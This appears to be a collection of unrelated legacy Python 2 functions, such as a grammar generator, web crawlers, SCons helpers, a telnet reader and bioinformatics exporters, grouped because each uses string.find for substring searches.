def generate(inputfilename, outputfilename='', dump=0, **flags): """Generate a grammar, given an input filename (X.g) and an output filename (defaulting to X.py).""" if not outputfilename: if inputfilename[-2:] == '.g': outputfilename = inputfilename[:-2] + '.py' else: raise Exception("Missing output filename") print 'Input Grammar:', inputfilename print 'Output File:', outputfilename DIVIDER = '\n%%\n' # This pattern separates the pre/post parsers preparser, postparser = None, None # Code before and after the parser desc # Read the entire file s = open(inputfilename, 'r').read() # See if there's a separation between the pre-parser and parser f = find(s, DIVIDER) if f >= 0: preparser, s = s[:f] + '\n\n', s[f + len(DIVIDER):] # See if there's a separation between the parser and post-parser f = find(s, DIVIDER) if f >= 0: s, postparser = s[:f], '\n\n' + s[f + len(DIVIDER):] # Create the parser and scanner p = ParserDescription(ParserDescriptionScanner(s)) if not p: return # Now parse the file t = wrap_error_reporter(p, 'Parser') if not t: return # Error if preparser is not None: t.preparser = preparser if postparser is not None: t.postparser = postparser # Check the options for f in t.options.keys(): for opt, _, _ in yapps_options: if f == opt: break else: print 'Warning: unrecognized option', f # Add command line options to the set for f in flags.keys(): t.options[f] = flags[f] # Generate the output if dump: t.dump_information() else: t.output = open(outputfilename, 'w') t.generate_output()
def test_runability(executable_name): "Output a warning message if the generated executable seems unlikely to run." if not executable_name or not os.access(executable_name, os.F_OK): # Executable doesn't exist (e.g., is "-"). return try: dynlib_cmd_tmpl = ncptl_config["DYNLIB_CMD_FMT"] dynlib_out = os.popen((dynlib_cmd_tmpl % executable_name)[1:-1]) oneline = dynlib_out.readline() while oneline: if string.find(oneline, "ncptl") != -1 and string.find(oneline, "not found") != -1: libdir = expanded_ncptl_config["libdir"] sys.stderr.write("#\n") sys.stderr.write("# WARNING: Don't forget to put %s in your dynamic library search path:\n" % libdir) try: ld_library_path = string.join([os.environ["LD_LIBRARY_PATH"], libdir], ":") except KeyError: ld_library_path = libdir sys.stderr.write("# [bash] export LD_LIBRARY_PATH=%s\n" % ld_library_path) sys.stderr.write("# [tcsh] setenv LD_LIBRARY_PATH %s\n" % ld_library_path) return oneline = dynlib_out.readline() dynlib_out.close() except: pass
def displayMessage ( self, aMessage ): """ in: string or list of string aMessage returns nothing """ self.restoreMessageWindow() iter = self.theMessageBuffer.get_iter_at_mark( self.endMark ) # writes string or list of strings to end of buffer if type(aMessage) == list: # If first string is not '\n', add it. if len(aMessage)>0: if string.find(aMessage[0],'\n') != 0: aMessage[0] = '\n' + aMessage[0] for aLine in aMessage: aString = str( aLine ) else: aString = str( aMessage ) if string.find(aString,'\n') != 0: aString = '\n' + aString self.theMessageBuffer.insert( iter, aString , len(aString) ) # scrolls textwindow to end of buffer self['textview1'].scroll_to_mark(self.endMark,0)
def countSubStringMatch(target, key): count = 0 initialIndex = 0 while string.find(target, key, initialIndex) != -1: count += 1 initialIndex = string.find(target, key, initialIndex) + len(key) - 1 print count
def getPage(self, url): r = Retrive(url) retval = r.download() if retval[0] == '*': print retval, 'sss' return Crawler.count += 1 self.seen.append(url) links = r.parseAndGetLinks() for eachlink in links: if eachlink[:4] != 'http' and find(eachlink, '://') == -1: eachlink = urljoin(url, eachlink) print '* ',eachlink if eachlink not in self.seen: if find(eachlink, self.dom) == -1: print ' ...discarded,not in domain' else: if eachlink not in self.q: self.q.append(eachlink) print ' ...new, added to Q' else: print ' ...discarded,already in Q' else: print ' ...discarded,process'
def replacestrs(filename, s, r): files = glob.glob(filename) for line in fileinput.input(files,inplace=1): string.find(line, s) line = line.replace(s, r) sys.stdout.write(line)
def _test_changing_upstream_list(self): bus.queryenv_service = qe config = bus.config sect_name = nginx.CNF_SECTION nginx_incl = "/etc/nginx/app-servers.include" config.set(sect_name, "app_include_path",nginx_incl) custom_include = 'upstream backend {\n\n server 8.8.8.8:80\tweight=5;\n\n server 7.7.7.7:80\tdebug;\n}' print custom_include with open(nginx_incl, 'w') as fp: fp.write(custom_include) n = nginx.NginxHandler() n._reload_upstream() n._reload_upstream() new_incl = None with open(nginx_incl, 'r') as fp: new_incl = fp.read() print new_incl #queryenv has only 8.8.8.8 in list_roles, so 7.7.7.7 supposed not to exist self.assertRaises(ValueError, string.index,*(new_incl, '7.7.7.7;')) #ip_hash wasn`t in original file, so after reconfigure it supposed not to exist either self.assertRaises(ValueError, string.index,*(new_incl, 'ip_hash;')) #8.8.8.8 had 'weight' option, so it not supposed to be vanished self.assertNotEquals(string.find(new_incl, 'weight=5;'), -1) #check that there is only one include include_str = 'include /etc/nginx/proxies.include;' self.assertNotEquals(string.find(new_incl, include_str), '-1') self.assertEquals(string.find(new_incl, include_str), string.rfind(new_incl, include_str))
def createCFGFiles(i,orgFile,basename,dir): newFile=basename + "_" + str(i) + ".py" newFile=os.path.join(dir,newFile) print(newFile) outFile = open(newFile,'w') for iline in orgFile: indx=string.find(iline,INPUTSTARTSWITH) if (indx == 0): indx2=string.find(iline,searchInput) if (indx2 < 0): print("Problem") sys.exit(1) else: iline=string.replace(iline,searchInput,str(i)) indx=string.find(iline,OUTPUTSTARTSWITH) if (indx == 0): indx2=string.find(iline,searchOutput) if (indx2 < 0): print("Problem") sys.exit(1) else: replString="_" + str(i) + searchOutput iline=string.replace(iline,searchOutput,replString) outFile.write(iline + "\n") CloseFile(outFile) return newFile
def processFlexResLinesV4(self, lines): #print "in processFlexResLinesV4: len(self.ligLines=)", len(self.ligLines) if self.version!=4.0: print "not version 4.0! RETURNING!!" return ligLINES = [] foundRun = 0 ind = 21 for l in lines: #in clustering dlg, multiple copies of input-pdbq are present if find(l, 'Run')>-1 and foundRun: break elif find(l, 'Run')>-1: foundRun = 1 elif find(l, '^_____________________')>-1: #last line is ________________- break else: ligLINES.append(l[ind:-1]) #check here to remove lines of just spaces nl = [] for l in ligLINES: if len(strip(l)): nl.append(l) self.flex_res_lines = nl #print "end pFRLV4: len(self.flex_res_lines)=", len(nl) #print "end processFlexResLinesV4: len(self.ligLines=)", len(self.ligLines) self.hasFlexRes = True self.flex_res_count = nl.count("REMARK status: ('A' for Active; 'I' for Inactive)")
def walk_directory(prefix=""): views = [] sections = [] for dirname, dirnames, filenames in os.walk('.'): for filename in filenames: filepart, fileExtension = os.path.splitext(filename) pos = filepart.find("ViewController") if string.lower(fileExtension) == ".xib" and pos > 0: # read file contents f = open(dirname + "/" + filename, 'r') contents = f.read() f.close() # identify identifier part vc_name = prefix_remover(filepart[0:pos], prefix) vc_name = special_names(vc_name) if string.find(contents, "MCSectionViewController") != -1 or string.find(contents, "SectionViewController") != -1: sections.append({ "type" : "section", "variable_name": "SECTION_" + string.upper(vc_name), "mapped_to" : filepart}) else: views.append({ "type" : "view", "variable_name": "VIEW_" + string.upper(vc_name), "mapped_to" : filepart }) return sections, views
def piped_spawn(sh, escape, cmd, args, env, stdout, stderr): # There is no direct way to do that in python. What we do # here should work for most cases: # In case stdout (stderr) is not redirected to a file, # we redirect it into a temporary file tmpFileStdout # (tmpFileStderr) and copy the contents of this file # to stdout (stderr) given in the argument if not sh: sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n") return 127 else: # one temporary file for stdout and stderr tmpFileStdout = os.path.normpath(tempfile.mktemp()) tmpFileStderr = os.path.normpath(tempfile.mktemp()) # check if output is redirected stdoutRedirected = 0 stderrRedirected = 0 for arg in args: # are there more possibilities to redirect stdout ? if string.find(arg, ">", 0, 1) != -1 or string.find(arg, "1>", 0, 2) != -1: stdoutRedirected = 1 # are there more possibilities to redirect stderr ? if string.find(arg, "2>", 0, 2) != -1: stderrRedirected = 1 # redirect output of non-redirected streams to our tempfiles if stdoutRedirected == 0: args.append(">" + str(tmpFileStdout)) if stderrRedirected == 0: args.append("2>" + str(tmpFileStderr)) # actually do the spawn try: args = [sh, "/C", escape(string.join(args))] ret = os.spawnve(os.P_WAIT, sh, args, env) except OSError, e: # catch any error try: ret = exitvalmap[e[0]] except KeyError: sys.stderr.write("scons: unknown OSError exception code %d - %s: %s\n" % (e[0], cmd, e[1])) if stderr != None: stderr.write("scons: %s: %s\n" % (cmd, e[1])) # copy child output from tempfiles to our streams # and do clean up stuff if stdout != None and stdoutRedirected == 0: try: stdout.write(open(tmpFileStdout, "r").read()) os.remove(tmpFileStdout) except (IOError, OSError): pass if stderr != None and stderrRedirected == 0: try: stderr.write(open(tmpFileStderr, "r").read()) os.remove(tmpFileStderr) except (IOError, OSError): pass return ret
def parseLaTeXFile( fid_tex, fid_html ): '''Parse LaTeX file''' # write html header write_html_header(fid_html) token = "\\begin{document}" this_line_number = 0 for line in fid_tex.readlines(): this_line_number += 1 # search for token base_index = string.find(line, token) if base_index >= 0: print " token '" + token + "' found on line " + str(this_line_number) + " : " + line line_sub = line[len(token)+1:len(line)] # search for new line end_index = string.find(line_sub, "\n") if end_index < 0: # no "\n" found: assume we should read entire line end_index = len(line_sub)-1 # write html footer write_html_footer(fid_html)
def check_config_h(): """Check if the current Python installation (specifically, pyconfig.h) appears amenable to building extensions with GCC. Returns a tuple (status, details), where 'status' is one of the following constants: CONFIG_H_OK all is well, go ahead and compile CONFIG_H_NOTOK doesn't look good CONFIG_H_UNCERTAIN not sure -- unable to read pyconfig.h 'details' is a human-readable string explaining the situation. Note there are two ways to conclude "OK": either 'sys.version' contains the string "GCC" (implying that this Python was built with GCC), or the installed "pyconfig.h" contains the string "__GNUC__". """ from distutils import sysconfig import string if string.find(sys.version, 'GCC') >= 0: return (CONFIG_H_OK, "sys.version mentions 'GCC'") fn = sysconfig.get_config_h_filename() try: f = open(fn) try: s = f.read() finally: f.close() except IOError as exc: return (CONFIG_H_UNCERTAIN, "couldn't read '%s': %s" % (fn, exc.strerror)) if string.find(s, '__GNUC__') >= 0: return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn) else: return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def read_until(self, match, timeout=None): """Read until a given string is encountered or until timeout. When no match is found, return whatever is available instead, possibly the empty string. Raise EOFError if the connection is closed and no cooked data is available. """ n = len(match) self.process_rawq() i = string.find(self.cookedq, match) if i >= 0: i = i+n buf = self.cookedq[:i] self.cookedq = self.cookedq[i:] return buf s_reply = ([self], [], []) s_args = s_reply if timeout is not None: s_args = s_args + (timeout,) while not self.eof and apply(select.select, s_args) == s_reply: i = max(0, len(self.cookedq)-n) self.fill_rawq() self.process_rawq() i = string.find(self.cookedq, match, i) if i >= 0: i = i+n buf = self.cookedq[:i] self.cookedq = self.cookedq[i:] return buf return self.read_very_lazy()
def _load_resource_from_path(app_root, service_name, conf, event_no): queue_name = conf['SQS_QUEUE'] mock_root = app_root + '/../mock' std_root = mock_root if 'MOCK_ROOT' in conf and conf['MOCK_ROOT'] is not None: mock_root = conf['MOCK_ROOT'] root = mock_root fname = 'event' fpath = '/' + service_name + '/' + queue_name + '/' + fname + '.' + str(event_no) try: file_path = convert_to_platform_safe(root + fpath) logger.info('mock file: ' + file_path) handle = open(file_path) except IOError: if std_root is not mock_root: try: file_path = convert_to_platform_safe(std_root + fpath) logger.info('mock file: ' + file_path) handle = open(file_path) except IOError: return data = handle.read() cut = string.find(data,'MOCKDATA-MOCKDATA-MOCKDATA') if cut>=0: data = data[string.find(data, '\n', cut)+1:] response = json.loads(data) return response
def __init__ ( self, numerator, denominator=1, carrier=0 ): """Constructor """ if numerator == None: self.numerator, self.denominator, self.rawnum, self.rawden, self.rawcar = None, None, None, None, None else: self.rawnum, self.rawden, self.rawcar = numerator, denominator, carrier if isinstance ( numerator, float ): from string import find numeratorStg = str ( numerator ) chkCarrier = lambda car : int ( ( car, '0' ) [ car == '' ] ) chkSign = lambda sig : ( 1, - 1 )[ sig < 0 ] carrier = chkCarrier ( numeratorStg [ 0:find ( numeratorStg, ".") ] ) numeratorStg = numeratorStg [ find ( numeratorStg, ".")+1: len ( numeratorStg ) ] numerator = int ( numeratorStg ) * chkSign ( numerator ) denominator = 10 ** len ( numeratorStg ) try: numerator += carrier * denominator except TypeError: numerator = None g = gcd ( numerator, denominator ) if g != None: self.numerator = numerator / g self.denominator = denominator / g else: self.numerator, self.denominator, self.rawnum, self.rawden, self.rawcar = None, None, None, None, None
def getPage(self, url): r = Retriever(url) retval = r.download() if retval[0] == '*': # error situation, do not parse print retval, '... skipping parse' return Crawler.count = Crawler.count + 1 print '\n(', Crawler.count, ')' print 'URL:', url print 'FILE:', retval[0] self.seen.append(url) links = r.parseAndGetLinks() # get and process links for eachLink in links: if eachLink[:4] != 'http' and \ find(eachLink, '://') == -1: eachLink = urljoin(url, eachLink) print '* ', eachLink, if find(lower(eachLink), 'mailto:') != -1: print '... discarded, mailto link' continue if eachLink not in self.seen: if find(eachLink, self.dom) == -1: print '... discarded, not in domain' else: if eachLink not in self.q: self.q.append(eachLink) print '... new, added to Q' else: print '... discarded, already in Q' else: print '... discarded, already processed'
def write(self,vars): """Merge ncdf.F90.in with definitions.""" numvars = 0 for v in vars: if vars[v]['dimensions'] != v: numvars = numvars + 1 self.thisvar = 1 self.print_warning() for l in self.infile.readlines(): for k in module.keys(): l = l.replace(k.upper(),module[k]) for token in self.handletoken: if string.find(l,token) is not -1: break if string.find(l,token) is not -1: for v in vars.keys(): self.handletoken[token](vars[v]) elif '!GENVAR_HOT!' in l: self.print_varhot() elif '!GENVAR_DIMS!' in l: self.print_dimensions() elif '!GENVAR_CHECKDIM!' in l: self.print_checkdims() else: self.stream.write("%s"%l) self.infile.close() self.stream.close()
def extract(self, string, start_marker, end_marker): """wrapper function for slicing into a string""" start_loc = string.find(start_marker) end_loc = string.find(end_marker) if start_loc == -1 or end_loc == -1: return "" return string[start_loc+len(start_marker):end_loc]
def platform_default(): """Return the platform string for our execution environment. The returned value should map to one of the SCons/Platform/*.py files. Since we're architecture independent, though, we don't care about the machine architecture. """ osname = os.name if osname == 'java': osname = os._osType if osname == 'posix': if sys.platform == 'cygwin': return 'cygwin' elif string.find(sys.platform, 'irix') != -1: return 'irix' elif string.find(sys.platform, 'sunos') != -1: return 'sunos' elif string.find(sys.platform, 'hp-ux') != -1: return 'hpux' elif string.find(sys.platform, 'aix') != -1: return 'aix' elif string.find(sys.platform, 'darwin') != -1: return 'darwin' else: return 'posix' elif os.name == 'os2': return 'os2' else: return sys.platform
def get_field_max(proc,time,fieldName): """ Unzip and read the data from all the specified fields in a given folder """ time_path = os.path.join(proc, time) if os.path.isdir(time_path): filePath = os.path.join(time_path,fieldName+'.gz') fz = gzip.open(filePath,'rb') content = fz.read() fz.close() loc1 = string.find(content,'internalField') chop1 = content[loc1:] loc2 = string.find(chop1,';') chop2 = chop1[13:loc2] if "nonuniform" not in chop2: maxVal = float(string.split(chop2)[1]) else: lines = chop2.split('\n') lines = lines[3:-2] maxVal = max([float(x) for x in lines]) return maxVal else: return None
def platform_default(): """Return the platform string for our execution environment. The returned value should map to one of the SCons/Platform/*.py files. Since we're architecture independent, though, we don't care about the machine architecture. """ osname = os.name if osname == "java": osname = os._osType if osname == "posix": if sys.platform == "cygwin": return "cygwin" elif string.find(sys.platform, "irix") != -1: return "irix" elif string.find(sys.platform, "sunos") != -1: return "sunos" elif string.find(sys.platform, "hp-ux") != -1: return "hpux" elif string.find(sys.platform, "aix") != -1: return "aix" elif string.find(sys.platform, "darwin") != -1: return "darwin" else: return "posix" elif os.name == "os2": return "os2" else: return sys.platform
def strToEventList( str_in ): events_idx = string.find(str_in, 'Events') # -1 is not found start_idx = string.find(str_in, '[', events_idx) # -1 is not found psn = start_idx+1 square_count = 1 curly_count = 0 events_str_array = [] while square_count > 0 and psn <= len(str_in): cur = str_in[psn] #if args.verbose: # print (psn, cur, square_count, curly_count, len(events_str_array)) if cur == '[': square_count += 1 elif cur == ']': square_count -= 1 elif cur == '{': if curly_count == 0: begin_psn = psn curly_count += 1 elif cur == '}': if curly_count == 1: events_str_array.append( str_in[begin_psn:psn+1] ) curly_count -= 1 psn += 1 return events_str_array
def find_tv_show_season(content, tvshow, season): url_found = None possible_matches = [] all_tvshows = [] h = HTMLParser.HTMLParser() for matches in re.finditer(movie_season_pattern, content, re.IGNORECASE | re.DOTALL): found_title = matches.group('title') found_title = h.unescape(found_title) log(__name__, "Found tv show season on search page: %s" % found_title) s = difflib.SequenceMatcher(None, string.lower(found_title + ' ' + matches.group('year')), string.lower(tvshow)) all_tvshows.append(matches.groups() + (s.ratio() * int(matches.group('numsubtitles')),)) if string.find(string.lower(found_title), string.lower(tvshow) + " ") > -1: if string.find(string.lower(found_title), string.lower(season)) > -1: log(__name__, "Matching tv show season found on search page: %s" % found_title) possible_matches.append(matches.groups()) if len(possible_matches) > 0: possible_matches = sorted(possible_matches, key=lambda x: -int(x[3])) url_found = possible_matches[0][0] log(__name__, "Selecting matching tv show with most subtitles: %s (%s)" % ( possible_matches[0][1], possible_matches[0][3])) else: if len(all_tvshows) > 0: all_tvshows = sorted(all_tvshows, key=lambda x: -int(x[4])) url_found = all_tvshows[0][0] log(__name__, "Selecting tv show with highest fuzzy string score: %s (score: %s subtitles: %s)" % ( all_tvshows[0][1], all_tvshows[0][4], all_tvshows[0][3])) return url_found
def shortcreateurls(input): curloc = 0 while curloc <> -1: curloc = string.find(input,"http://",curloc) if -1 <> curloc: maxend = string.find(input," ",curloc) if maxend == -1: maxend = len(input) length = maxend-curloc a = input[curloc+length-1] while a == '.' or a == ']' or a == ')' or a == ',' or a == ';': length -= 1 a = input[curloc+length-1] firstslash = curloc+7 while firstslash<len(input) and input[firstslash] <> "/" and firstslash<curloc+length: firstslash += 1 output = '('+input[curloc+7:firstslash]+") "+'<a class="saxgray" href="' output = output + input[curloc:curloc+length] + '" target="_blank">[Link]</a>' print(output) newlen = len(output) if curloc > 0: output = input[0:curloc-1] + output if curloc + length < len(input): output = output + input[curloc+length:-1] input = output curloc = curloc+newlen return shorturls(input,0)
def query_info_Request_Structure(Query_info, fileId, *query_info_params): infotypefound = 0 fileinfoclassfound = 0 cnt = 0 while ( cnt < len(query_info_params)): tmpstr = query_info_params[cnt] tmpstr = tmpstr.strip() tmpstr = tmpstr.lower() if( string.find(tmpstr, 'infotype') != -1): tmpstr = (tmpstr[(string.find(tmpstr,'=')+1):]).strip() infotype = eval(tmpstr) infotypefound = 1 elif( string.find(tmpstr, 'fileinfoclass') !=-1): tmpstr = (tmpstr[(string.find(tmpstr,'=')+1):]).strip() fileinfoclass = eval(tmpstr) fileinfoclassfound = 1 #print fileinfoclass cnt += 1 if (infotypefound == 0): infotype = 0x0 if (fileinfoclassfound == 0): fileinfoclass = 0x0 Query_info1 = query_info_Extend_Request_Structure(Query_info, fileId, infotype, fileinfoclass) return Query_info1
def getspec( infile, region='relpix,box(-2,-2,0,0)', vsource=5., hann=5, tmpfile="junk" ): '''dump out spectrum of selected region with imspec, return [chan, freqLSR, flux] arrays''' # step 1: use imlist to retrieve velocity and freq information from the header p= subprocess.Popen( ( shlex.split('imlist in=%s' % infile) ), \ stdout=subprocess.PIPE,stdin=subprocess.PIPE,stderr=subprocess.STDOUT) result = p.communicate()[0] lines = result.split("\n") for line in lines : if len(line) > 1 : a = line.split() n = string.find( line, "restfreq:" ) if n >= 0 : restfreq = float( line[n+9:].split()[0] ) n = string.find( line, "crval3 :" ) if n >= 0 : v1 = float( line[n+9:].split()[0] ) n = string.find( line, "cdelt3 :" ) if n >= 0 : dv = float( line[n+9:].split()[0] ) print "restfreq = %.5f GHz; v1 = %.3f km/sec; dv = %.3f km/sec" % (restfreq,v1,dv) # step 2: use imspec to dump out the spectrum for the selected region to tmpfile chan = [] freq = [] flux = [] p= subprocess.Popen( ( shlex.split("imspec in=%s region=%s options=list,eformat,noheader,hanning,%d log=%s" % \ (infile,region,hann,tmpfile) )), stdout=subprocess.PIPE,stdin=subprocess.PIPE,stderr=subprocess.STDOUT) time.sleep(1) result = p.communicate()[0] print result if "Fatal Error" in result : print " --- fatal --- " return # step 3: read velocities and flux densities from tmpfile, create arrays fin = open( tmpfile, "r" ) for line in fin : a = line.split() if len(a) > 2 : chan.append( int(a[0]) ) nchan = int( a[0] ) vlsr = float( a[1] ) flux.append( float( a[2] ) ) vlsrcalc = v1 + (nchan - 1) * dv if abs(vlsrcalc-vlsr) > 0.05 : print "WARNING: channel %d listed vlsr = %.2f, calculated = %.2f" % (nchan,vlsr,vlsrcalc) fqLSR = restfreq * (1. - vlsrcalc/clight) freq.append( fqLSR/(1.-vsource/clight) ) #print nchan, vlsrcalc, fqLSR, freq[-1] # freq in rest frame of source fin.close() print "read in %d lines" % len(freq) # step 4: sort in frequency order, return arrays spectrum = numpy.array(sorted(zip(freq,chan,flux))) # this sorts the chan,freq,flux triplets in freq order a,b,c = numpy.split( spectrum, 3, axis=1 ) # this returns separate freq and flux arrays return numpy.reshape(b,len(a)), numpy.reshape(a,len(b)), numpy.reshape(c,len(c))
def walking(skip, dirname, names): print if dirname in skip: print 'skipping', dirname else: print 'working in', dirname for name in names: if dirname!=os.curdir: filename = os.path.join(dirname, name) else: filename = name if os.path.isfile(filename)==1: if string.find(filename, ".htm")<>-1 \ or string.find(filename, ".shtm")<>-1: print 'file:', filename, ' ---- ', # fix and validate xhtml print 'Tidy,' os.system('tidy -q -m ' + filename) # to be added: linbot link check # to be added: bobby accessibility check elif string.find(filename, ".css")<>-1: #w3c css validator classpath = ' E:\\lib\\validator.zip org.w3c.css.css.StyleSheetCom ' os.system('java -classpath' + classpath + filename) else: print 'file:', filename, ' ---- ', print 'no processing'
def subStringMatchExact(target,key): startingList = [] initialIndex = 0 while string.find(target,key,initialIndex) != -1: startingList.append(string.find(target,key,initialIndex)) initialIndex = string.find(target, key, initialIndex) + len(key) - 1 print tuple(startingList)
def allinstances(string, letter): listindex = [] i = string.find(letter,1) # 1 is because there is a space added before word. don't know what that does while i >= 0: listindex.append(i) i = string.find(letter, i + 1) return listindex
def exportAltMouseExonSequence(): probeset_exon_db = {} x = 0 species = 'Mm' array_type = 'AltMouse' critical_exon_import_file = 'AltDatabase/Mm/AltMouse/AltMouse_junction-comparisons.txt' update.verifyFile(critical_exon_import_file, array_type) critical_exon_db = {} critical_probesets = {} fn = filepath(critical_exon_import_file) for line in open(fn, 'rU').xreadlines(): data = cleanUpLine(line) gene, probeset1, probeset2, critical_exons = string.split(data, '\t') critical_exons = string.split(critical_exons, '|') for exon in critical_exons: try: critical_exon_db[gene, exon].append(probeset1 + '-' + probeset2) except KeyError: critical_exon_db[gene, exon] = [probeset1 + '-' + probeset2] critical_probesets[probeset1] = [] critical_probesets[probeset2] = [] probeset_annotations_file = "AltDatabase/Mm/AltMouse/MASTER-probeset-transcript.txt" update.verifyFile(probeset_annotations_file, array_type) fn = filepath(probeset_annotations_file) for line in open(fn, 'rU').xreadlines(): probeset_data = cleanUpLine(line) #remove endline if x == 0: x = 1 else: probeset, affygene, exons, transcript_num, transcripts, probe_type_call, ensembl, block_exon_ids, block_structure, comparison_info = string.split( probeset_data, '\t') if probeset in critical_probesets: exons = exons[:-1] exons = string.split(exons, '-') affygene = affygene[:-1] if '|' in exons: print exons kill probeset_exon_db[probeset, affygene] = exons exon_protein_sequence_file = "AltDatabase/Mm/AltMouse/SEQUENCE-transcript-dbase.txt" update.verifyFile(exon_protein_sequence_file, array_type) transcript_cdna_sequence_dbase, transcript_associations, exon_sequence_database = import_existing_sequence_build( exon_protein_sequence_file) critical_exon_seq_export = 'AltDatabase/Mm/AltMouse/AltMouse_critical-exon-seq.txt' update.verifyFile(critical_exon_seq_export, array_type) fn = filepath(critical_exon_seq_export) data = open(fn, 'w') title = ['Affygene:exon', 'critical_exon-num', 'critical-probeset-comps'] title = string.join(title, '\t') + '\n' data.write(title) for (gene, exon_num) in critical_exon_db: probeset_comp_list = critical_exon_db[(gene, exon_num)] probeset_comp_list = string.join(probeset_comp_list, '|') try: ###Restrict export to previously exported critical exons (ExonAnnotate_module) exon_sequence_database[(gene, exon_num)] esd = exon_sequence_database[(gene, exon_num)] exon_seq = esd.ExonSeq() exon_data = string.join( [gene + ':' + exon_num, probeset_comp_list, exon_seq], '\t') + '\n' data.write(exon_data) except KeyError: null = [] data.close() probeset_seq_file = 'AltDatabase/Mm/AltMouse/probeset_sequence_reversed.txt' update.verifyFile(probeset_seq_file, array_type) probeset_seq_db = {} x = 0 fn = filepath(probeset_seq_file) for line in open(fn, 'rU').xreadlines(): if x == 0: x = 1 else: data = cleanUpLine(line) t = string.split(data, '\t') probeset = t[0] probeset_seq_list = t[1:] probeset_seq_db[probeset] = probeset_seq_list critical_junction_seq_export = 'AltDatabase/Mm/AltMouse/AltMouse_critical-junction-seq.txt' update.verifyFile(critical_junction_seq_export, array_type) fn = filepath(critical_junction_seq_export) data = open(fn, 'w') x = 0 k = 0 l = 0 title = ['probeset', 'probeset-seq', 'junction-seq'] title = string.join(title, '\t') + '\n' data.write(title) for (probeset, gene) in probeset_exon_db: junction_seq = [] y = 0 positions = [] try: probeset_seq_list = probeset_seq_db[probeset] for exon_num in probeset_exon_db[(probeset, gene)]: try: ###Restrict export to previously exported critical exons (ExonAnnotate_module) exon_sequence_database[(gene, exon_num)] esd = exon_sequence_database[(gene, exon_num)] exon_seq = esd.ExonSeq() strand = esd.Strand() junction_seq.append(exon_seq) y += 1 #exon_data = string.join([gene+':'+exon_num,probeset_comp_list,exon_seq],'\t')+'\n' #data.write(exon_data) except KeyError: null = [] #if 'E5' in probeset_exon_db[(probeset,gene)]: if y > 0: if strand == '-': junction_seq.reverse() junction_seq_str = string.join(junction_seq, '') junction_seq_str = string.upper(junction_seq_str) not_found = 0 for probeset_seq in probeset_seq_list: #probeset_seq = reverse_string(probeset_seq) probeset_seq_rev = reverse_orientation(probeset_seq) if probeset_seq in junction_seq_str: f = string.find(junction_seq_str, probeset_seq) positions.append((f, len(probeset_seq))) k += 1 else: not_found = 1 x += 1 if not_found == 1: new_probeset_seq = probeset_seq_list[ 0] ###pick the first probe sequence found if len(positions) > 0: positions.sort() new_probeset_seq = junction_seq_str[ positions[0][0]:positions[-1][0] + positions[-1][1]] #print new_probeset_seq,positions, probeset,probeset_exon_db[(probeset,gene)],probeset_seq_list,junction_seq;kill junction_seq = string.join( junction_seq, '|') ###indicate where the junction is probe_seq_data = string.join( [probeset, new_probeset_seq, junction_seq], '\t') + '\n' data.write(probe_seq_data) except KeyError: null = [] data.close() print k, x
def http_response(self, request, response): """ Inspect the http response from urllib2 and see if there is a refresh response header. If there is, then attempt to follow it and re-execute the query using the new host. :param request: :param response: :return: """ # extract the original response code and headers response_code = response.code # unless we got back a 200 don't do any further processing if response_code != 200: return response # attempt to parse and follow the refresh header if it exists try: response_headers = response.info() refresh_header = None for response_header_key in response_headers.keys(): if response_header_key.lower() == REFRESH_HEADER.lower(): refresh_header = response_headers.getheader( response_header_key) break if refresh_header is None: return response # at this point the header should resemble # Refresh: 3; url=http://c6403.ambari.apache.org:8088/ semicolon_index = string.find(refresh_header, ';') # slice the redirect URL out of # 3; url=http://c6403.ambari.apache.org:8088/jmx" if semicolon_index >= 0: redirect_url_key_value_pair = refresh_header[semicolon_index + 1:] else: redirect_url_key_value_pair = refresh_header equals_index = string.find(redirect_url_key_value_pair, '=') key = redirect_url_key_value_pair[:equals_index] redirect_url = redirect_url_key_value_pair[equals_index + 1:] if key.strip().lower() != REFRESH_HEADER_URL_KEY: logger.warning("Unable to parse refresh header {0}".format( refresh_header)) return response # extract out just host:port # c6403.ambari.apache.org:8088 redirect_netloc = urlparse(redirect_url).netloc # deconstruct the original request URL into parts original_url_parts = urlparse(request.get_full_url()) # build a brand new URL by swapping out the original request URL's # netloc with the redirect's netloc redirect_url = urlunparse( ParseResult(original_url_parts.scheme, redirect_netloc, original_url_parts.path, original_url_parts.params, original_url_parts.query, original_url_parts.fragment)) # follow the new new and return the response return self.parent.open(redirect_url) except Exception, exception: logger.error("Unable to follow refresh header {0}. {1}".format( refresh_header, str(exception)))
def setupbe(args): # the list of classes in the back end clar = [ 'Interface', 'Operation', 'Type', 'Predefined', 'Alias', 'Enumeration', 'Record', 'RecordMember', 'Choice', 'ChoiceElement', 'Array', 'Sequence', 'BitSet', 'ByteSequence', 'ByteArray', 'Set', 'Ref', 'InterfaceRef', 'Import', 'Exception', 'Parameter', 'Result' ] clinherit = {} for cl in clar: clinherit[cl] = [] genlist = [] for be in args: loc = string.find(be, '[') if loc == -1: list = ['default'] name = be else: name = be[:loc] params = be[loc + 1:-1] list = string.split(params, ',') genlist.append((name, list)) golist = [] for (arg, list) in genlist: impname = 'gen' + arg exec 'import ' + impname for cl in clar: gotit = 0 try: subcl = eval(impname + '.' + cl) gotit = 1 except: pass if gotit: clinherit[cl].append(impname + '.' + cl) #print 'Registered '+impname+'.'+cl+'('+`subcl`+')' golist.append((eval(impname + '.Go'), list, arg, list)) classtable = {} classtable['golist'] = golist for cl in clar: if len(clinherit[cl]) == 0: l = 'BE.' + cl else: l = '' for interface in clinherit[cl]: l = l + interface if interface != clinherit[cl][-1]: l = l + ',' str = 'class ' + cl + '(' + l + ')' + ': pass' exec str classtable[cl] = eval(cl) predef = [('octet', 'uint8_t'), ('short_cardinal', 'uint16_t'), ('cardinal', 'uint32_t'), ('long_cardinal', 'uint64_t'), ('char', 'int8_t'), ('short_integer', 'int16_t'), ('integer', 'int32_t'), ('long_integer', 'int64_t'), ('real', 'float32_t'), ('long_real', 'float64_t'), ('boolean', 'bool_t'), ('string', 'string_t'), ('dangerous_word', 'word_t'), ('dangerous_address', 'addr_t')] basictypesdict = {} count = 1 for (middlname, cname) in predef: instance = classtable['Type']().predef(count, cname, classtable['Predefined']()) basictypesdict[middlname] = instance count = count + 1 classtable['builtin'] = basictypesdict return classtable
